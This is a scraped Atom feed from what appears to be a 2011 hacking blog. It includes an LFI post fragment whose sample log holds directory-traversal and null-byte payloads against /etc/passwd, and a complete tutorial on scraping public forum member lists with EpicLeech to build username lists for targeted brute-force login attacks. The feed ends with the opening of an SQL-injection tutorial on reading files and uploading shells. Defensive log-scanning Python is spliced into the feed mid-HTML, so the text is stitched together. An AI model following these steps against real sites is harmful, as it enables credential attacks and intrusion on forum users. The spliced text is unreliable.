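# 203.0.113.7 sends three requests of the kind the scanner above produces.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Aug/2011:14:49:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120
203.0.113.7 - - [19/Aug/2011:14:49:02 -0500] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1834
203.0.113.7 - - [19/Aug/2011:14:49:03 -0500] "GET /index.php?page=../../../../var/log/apache2/access_log%00 HTTP/1.1" 200 91023
203.0.113.7 - - [19/Aug/2011:14:49:04 -0500] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 312
198.51.100.2 - - [19/Aug/2011:14:50:10 -0500] "GET /images/logo.png HTTP/1.1" 200 4096
"""

# Common Log Format: client, ident, user, [time], "method target proto", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) ([^"]+)" (\d{3}) (\S+)')

# Indicators: parent-directory traversal, and the file names the path list above tries.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')
SENSITIVE_RE = re.compile(r'etc/passwd|access_log|error_log|httpd\.conf')

def decode_target(target, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded sequences are seen too."""
    decoded = target
    for _ in range(rounds):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return decoded

def indicators(target):
    """Names of the LFI indicators present in one request target."""
    decoded = decode_target(target)
    found = []
    if TRAVERSAL_RE.search(decoded):
        found.append("traversal")
    if "\x00" in decoded:          # %00 decodes to a NUL byte
        found.append("null-byte")
    if SENSITIVE_RE.search(decoded):
        found.append("sensitive-file")
    return found

def scan_log(text):
    """One finding per log line whose request target carries at least one indicator.
    Non-200 responses are kept: the attempt was made whether or not it succeeded."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = indicators(m.group(4))
        if hits:
            findings.append({"client": m.group(1), "target": m.group(4),
                             "status": int(m.group(6)), "indicators": hits})
    return findings

def noisy_clients(findings, threshold=3):
    """Clients with at least `threshold` flagged requests; a path list like the one
    above produces hundreds of them within seconds."""
    counts = Counter(f["client"] for f in findings)
    return {client: n for client, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['client']} {f['status']} {f['target']} {f['indicators']}")
    print("noisy clients:", noisy_clients(found))
```

On a real log, pass the file contents to scan_log and tune the noisy_clients threshold to the site; the 404 in the sample is kept on purpose, because the scanner above only reports successful reads while the server records every attempt, and the failed attempts are usually the earliest signal.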
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/cAMgV2BcbfNmvTCYUYMDw2YU7oI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cAMgV2BcbfNmvTCYUYMDw2YU7oI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/cAMgV2BcbfNmvTCYUYMDw2YU7oI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cAMgV2BcbfNmvTCYUYMDw2YU7oI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/CWtAZ/~4/knfHqI3dgGg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/2094454163405034310/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/08/automated-lfirfi-scanning-exploiting.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/2094454163405034310?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/2094454163405034310?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/knfHqI3dgGg/automated-lfirfi-scanning-exploiting.html" title="AUTOMATED LFI/RFI SCANNING &amp; EXPLOITING WITH FIMAP" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>2</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/08/automated-lfirfi-scanning-exploiting.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkAMRn89eCp7ImA9WhdRGUQ.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-1674707592118642464</id><published>2011-08-10T11:46:00.000-05:00</published><updated>2011-08-10T11:46:27.160-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-10T11:46:27.160-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="User leecher" /><category scheme="http://www.blogger.com/atom/ns#" term="user leech" /><category scheme="http://www.blogger.com/atom/ns#" term="epic leech username 
leecher" /><category scheme="http://www.blogger.com/atom/ns#" term="EPIC LEECH" /><category scheme="http://www.blogger.com/atom/ns#" term="epic" /><category scheme="http://www.blogger.com/atom/ns#" term="usernames list" /><category scheme="http://www.blogger.com/atom/ns#" term="usernames" /><category scheme="http://www.blogger.com/atom/ns#" term="Leecher" /><category scheme="http://www.blogger.com/atom/ns#" term="Leech" /><category scheme="http://www.blogger.com/atom/ns#" term="extraction" /><title>CREATING TARGETED USERNAME LISTS WITH EPIC LEECH</title><content type="html">&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Today I am going to show you how to use EpicLeech.EXE to leech username lists from public forums. This tool can be very handy in putting together valid user list for targeted bruteforce attacks, which speeds things up considerably since you are using known usernames instead of bruteforcing both user and pass. It can be a little tricky at first but if you stick with it you can set up new site configurations in very little time. 
Here goes, try to keep up…&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Pre-requisites:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;EpicLeech.EXE (with a handful of configurations already done for you) which you can download from here: &lt;/span&gt;&lt;a href="http://www.megaupload.com/?d=TUAJDMZJ"&gt;&lt;span style="font-family: Calibri;"&gt;http://www.megaupload.com/?d=TUAJDMZJ&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Target site with publicly available members page (i.e. 
no login required to view list)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 74.55pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Use Google, try: “inurl:members.php”&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 74.55pt; mso-add-space: auto;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;, &amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Open EpicLeech.EXE p and it should look like this:&lt;/span&gt; &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imageshack.us/img6/8466/38778977.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="355" naa="true" src="http://img6.imageshack.us/img6/8466/38778977.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;In order to create our own click the “Login Editor” button in the lower right, should open a new window that looks like this one:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img851.imageshack.us/img851/6146/77648902.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="341" naa="true" src="http://img851.imageshack.us/img851/6146/77648902.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-family: Calibri;"&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;This is what we will use to create our own custom template so that we can leech a large username list from our target site. &lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;I should call out that this will only work if you can view the members list of the target website without needing to login. You first need to have a target site in mind that you eventually want to try and bruteforce/dictionary attack to find valid credentials. You can use Google to find them, if you need some quick examples to get you started just type “forum, members list” in Google or use your own creative dork and you will find an endless list of possibilities. Once you have found one you want to use, you will need to open it up in your favorite browser and then click on page 2 of the members list, so we can see how it is sorting the pages. 
You should find that the URL link will have either “page=” or “st=”.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;We will use this to set the “Sort Option” on the Epic Leech options, just make sure they match how the target site is sorting and you will be fine (it is pretty easy to match up). Here is a quick recap, now that we have some basic info gathered:&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;Example Link to Members Page: &lt;a href="http://www.vbulletin.org/forum/memberlist.php"&gt;http://www.vbulletin.org/forum/memberlist.php&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;Example Link to Members Page 2: &lt;a href="http://www.vbulletin.org/forum/memberlist.php?&amp;amp;order=asc&amp;amp;sort=username&amp;amp;page=2"&gt;http://www.vbulletin.org/forum/memberlist.php?&amp;amp;order=asc&amp;amp;sort=username&amp;amp;page=2&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img718.imageshack.us/img718/1548/10182848.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="341" naa="true" src="http://img718.imageshack.us/img718/1548/10182848.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;The “Name” field is optional and is what will show up in the leech options for the profile. The host name is the site we will be targeting. The GET string is the trailing url or directory path to send the requests to. You will need to change the page number at the end to [MPP], so that the tool knows to replace this parameter based on the details provided for Users Per Page and # of Pages when doing the actual leeching. You can pull the info for Users Per Page and the # of Pages fields from the actual website, you might have to do some quick math or possible click the link to go to last page to see how many there actually are. 
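The paging walk described here (the same member-list URL with page= or st= stepping through every page in order) also leaves a distinctive trace in the forum's own access log. The following Python is an added example written for this page, not part of this post or of EpicLeech: it groups member-list requests by client, reads the page= or st= value with urllib.parse, and reports clients that walked at least a configurable number of distinct pages. The log lines are constructed samples, and the member-list path pattern is an assumption that a real deployment would replace with its own paths.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access-log lines (not real traffic). 203.0.113.9 walks a
# vBulletin-style list with page=, 192.0.2.5 walks an st= offset list, and
# 198.51.100.4 views a single page the way an ordinary visitor would.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Aug/2011:11:46:01 -0500] "GET /forum/memberlist.php?page=1 HTTP/1.1" 200 41200
203.0.113.9 - - [10/Aug/2011:11:46:02 -0500] "GET /forum/memberlist.php?page=2 HTTP/1.1" 200 41350
203.0.113.9 - - [10/Aug/2011:11:46:03 -0500] "GET /forum/memberlist.php?page=3 HTTP/1.1" 200 41180
203.0.113.9 - - [10/Aug/2011:11:46:04 -0500] "GET /forum/memberlist.php?page=4 HTTP/1.1" 200 41290
203.0.113.9 - - [10/Aug/2011:11:46:05 -0500] "GET /forum/memberlist.php?page=5 HTTP/1.1" 200 41310
192.0.2.5 - - [10/Aug/2011:11:48:00 -0500] "GET /community/members/?st=0 HTTP/1.1" 200 38800
192.0.2.5 - - [10/Aug/2011:11:48:01 -0500] "GET /community/members/?st=30 HTTP/1.1" 200 38910
192.0.2.5 - - [10/Aug/2011:11:48:02 -0500] "GET /community/members/?st=60 HTTP/1.1" 200 38870
192.0.2.5 - - [10/Aug/2011:11:48:03 -0500] "GET /community/members/?st=90 HTTP/1.1" 200 38890
198.51.100.4 - - [10/Aug/2011:11:47:30 -0500] "GET /forum/memberlist.php?page=2 HTTP/1.1" 200 41350
198.51.100.4 - - [10/Aug/2011:11:47:45 -0500] "GET /forum/showthread.php?t=1234 HTTP/1.1" 200 20100
"""

# Common Log Format: client, ident, user, [time], "method target proto", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) ([^"]+)" (\d{3}) (\S+)')

# Assumed member-list path pattern, and the two paging parameters the post names.
MEMBER_LIST_RE = re.compile(r'member', re.IGNORECASE)
PAGING_PARAMS = ("page", "st")

def paging_key(target):
    """Return (path, param, value) when target is a member-list page carrying a
    paging parameter, otherwise None."""
    parts = urlsplit(target)
    if not MEMBER_LIST_RE.search(parts.path):
        return None
    query = parse_qs(parts.query)
    for param in PAGING_PARAMS:
        if param in query:
            return parts.path, param, query[param][0]
    return None

def enumerators(text, min_pages=4):
    """Group member-list requests by client and report clients that requested
    at least min_pages distinct pages, with the paging parameter they used."""
    pages_seen = defaultdict(set)
    param_used = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        key = paging_key(m.group(4))
        if key is None:
            continue
        path, param, value = key
        client = m.group(1)
        pages_seen[client].add((path, value))
        param_used[client] = param
    return {
        client: {"pages": len(seen), "param": param_used[client]}
        for client, seen in pages_seen.items()
        if len(seen) >= min_pages
    }

if __name__ == "__main__":
    for client, info in enumerators(SAMPLE_LOG).items():
        print(f"{client}: {info['pages']} distinct pages via {info['param']}=")
```

Distinct page values are counted rather than raw requests so that a visitor reloading one page is not flagged; min_pages is the knob to tune against the site's normal browsing depth, and a windowed version of the same count (pages per client per minute) is the usual next step.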
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;OK, so those are the basics. Now we need to determine the correct parsing options, which tell the EpicLeech.EXE tool how to pull the data from the source code of the pages it requests. If you mess this up you will get more than just the usernames, which makes the list fairly useless to you, so make sure you get this part right! Go back to the member page you opened in your browser earlier and view the source code of the page. Take note of at least one username on the page, as we will use “CTRL+F” on the source view to quickly find that same username in the source code. This makes it a bit easier to determine where the proper UNIQUE tags to use are. &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img688.imageshack.us/img688/2212/93445644.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" naa="true" src="http://img688.imageshack.us/img688/2212/93445644.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;The actual source code for the username is below; note that “-mk-” is the username I am focusing on to find the tags to use for parsing.&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;USERNAME CODE FROM EXAMPLE:&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;pre style="background: white; font-family: 'Courier New'; font-size: 10pt; line-height: normal; margin: 0in 0in 0pt;"&gt;
&amp;lt;/tr&amp;gt;&amp;lt;tr align="center"&amp;gt;
    &amp;lt;td class="alt1Active" align="left" id="u34580"&amp;gt;
        &amp;lt;a href="member.php?u=34580"&amp;gt;&lt;span style="background: lime;"&gt;-mk-&lt;/span&gt;&amp;lt;/a&amp;gt;
        &amp;lt;div class="smallfont"&amp;gt;&amp;lt;a style="text-decoration:none; color:#000088;" href="member.php?u=34580" title="No Releases"&amp;gt;Member&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;
    &amp;lt;/td&amp;gt;

    &amp;lt;td class="alt2"&amp;gt;&amp;lt;a href="search.php?do=finduser&amp;amp;amp;u=34580" rel="nofollow"&amp;gt;&amp;lt;img src="images/cstyle/blue/buttons/find.gif" alt="find.gif" &lt;b&gt;&lt;span style="background: yellow;"&gt;title="Find all posts by&lt;/span&gt;&lt;/b&gt; &lt;span style="background: lime;"&gt;-mk-&lt;/span&gt;&lt;b&gt;&lt;span style="background: yellow;"&gt;" border="0"&lt;/span&gt;&lt;/b&gt; /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;td class="alt1"&amp;gt;08 May 2003&amp;lt;/td&amp;gt;
    &amp;lt;td class="alt2"&amp;gt;11&amp;lt;/td&amp;gt;
    &amp;lt;td class="alt1"&amp;gt;07 Jul 2009&amp;lt;/td&amp;gt;
    &amp;lt;td class="alt2"&amp;gt;&amp;lt;img class="inlineimg" src="images/reputation/reputation_balance.gif" alt="&lt;span style="background: lime;"&gt;-mk-&lt;/span&gt; is an unknown quantity at this point" border="0" /&amp;gt;&amp;lt;/td&amp;gt;
&lt;/pre&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;You will need to determine whether to use the single parse technique or the double parse technique. In this example, the single parsing technique works correctly. If the tags we were using appeared elsewhere in the code, we would need the double parse technique to extract properly from this target, because the same HTML code and tags would occur in more than one place in the source code (not just around the username); so we either need more unique tags (which are not available) or we do a double parse. Double parsing works by identifying a set of tags to mark in the first run; the tool then looks inside those tags and parses again using a second set of tags. This way, if the second set of tags is not present, no extraction occurs, which helps filter out garbage and focus on usernames since both conditions must be true. Trial and error will help you figure this out if you don’t pick it up right away; just keep playing with the tags you are using to see how it affects what is extracted as a “username”. If you can’t get any success with single parsing, try a double parse with secondary tags to narrow down your results.&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;Using the example code above we would need to parse between ‘title="Find all posts by’ and ’border="0"’. Just so you know, I tried using single and double parsing to pull the first occurrence of the username in the code example above but was not able to get things to extract properly, so I moved lower in the code and realized it also has an entry linking to each username’s posted threads. This allowed me a second chance to try things out, which are working at the moment I wrote this; here is the final configuration I came up with:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img221.imageshack.us/img221/627/16104235k.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="341" naa="true" src="http://img221.imageshack.us/img221/627/16104235k.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;You have just created your first leeching profile. Hit the “Save Site” button and you will see your new profile in the list of available options to leech from. Go ahead and fire it up and start testing it; if too much is being pulled in, review the tags being used for parsing and adjust until you find the combination that works for your particular target. Also be aware that sites make updates all the time, so a profile may work one day and be worthless the next, but now that you know how to make your own, that won’t be an issue anymore. I hope you have enjoyed this brief overview on creating username lists from forums with publicly available members lists, and feel free to use this template for vBulletin forums if you like. 
I will try to do a follow up series on how to use this list in other tools like Villain, Apex, or your cracker of choice to find tons of valid credentials to various other sites. &lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;Proof it works (also see list included with download):&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img708.imageshack.us/img708/9716/42581222.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="355" naa="true" src="http://img708.imageshack.us/img708/9716/42581222.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;Rinse, wash, and repeat as needed. Until next time, Enjoy!&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;Laters,&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;H.R.&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;
</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/1674707592118642464/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/08/creating-targeted-username-lists-with.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/1674707592118642464?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/1674707592118642464?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/CY-Td96qPLM/creating-targeted-username-lists-with.html" title="CREATING TARGETED USERNAME LISTS WITH EPIC LEECH" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/08/creating-targeted-username-lists-with.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMFQnk9eip7ImA9WhdRE00.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-5863178670423708574</id><published>2011-08-02T13:06:00.000-05:00</published><updated>2011-08-02T13:06:53.762-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-02T13:06:53.762-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><category scheme="http://www.blogger.com/atom/ns#" term="LOAD FILE" /><category scheme="http://www.blogger.com/atom/ns#" term="LOAD_FILE()" /><category
scheme="http://www.blogger.com/atom/ns#" term="INTO DUMPFILE" /><category scheme="http://www.blogger.com/atom/ns#" term="SQLi" /><category scheme="http://www.blogger.com/atom/ns#" term="Upload Shell via SQLi" /><category scheme="http://www.blogger.com/atom/ns#" term="INTO_DUMPFILE()" /><category scheme="http://www.blogger.com/atom/ns#" term="Database Hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="INTO_OUTFILE()" /><category scheme="http://www.blogger.com/atom/ns#" term="SHELL" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="INTO OUTFILE" /><category scheme="http://www.blogger.com/atom/ns#" term="Webshell" /><title>SQL Injection: How to use LOAD FILE &amp; INTO DUMPFILE</title><content type="html">&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;I have covered several techniques on my blog on how to perform SQL injections, and today I want to add another cool trick to the arsenal we have at hand. In today’s article I am going to let you in on a little secret: how to use INTO OUTFILE &amp;amp; LOAD_FILE() during your SQLi adventures to go a little deeper when machines are misconfigured and left wide open. The techniques I will cover today will help you gain access to files on the target machine, and show you how to upload your own files and code onto the target machine, all without ever setting foot in the administration panel of the target website. Please try to keep up, here we go…&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;I will assume you have followed one of my previous tutorials from here on SQLi and found a target site that is indeed vulnerable, and now we will see if we can take things a step further this time by reading files from the target system and then testing whether or not we can upload our own files to said machine. In order to test the file access we have a few pre-requisites and then we have a few options:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;PRE-REQUISITES&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Vulnerable target site&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;We need to know the current user name&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Check other SQLi tutorials on methods for checking current 
user()&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;We need to know the current database&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Check other SQLi tutorials on methods for checking current database()&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
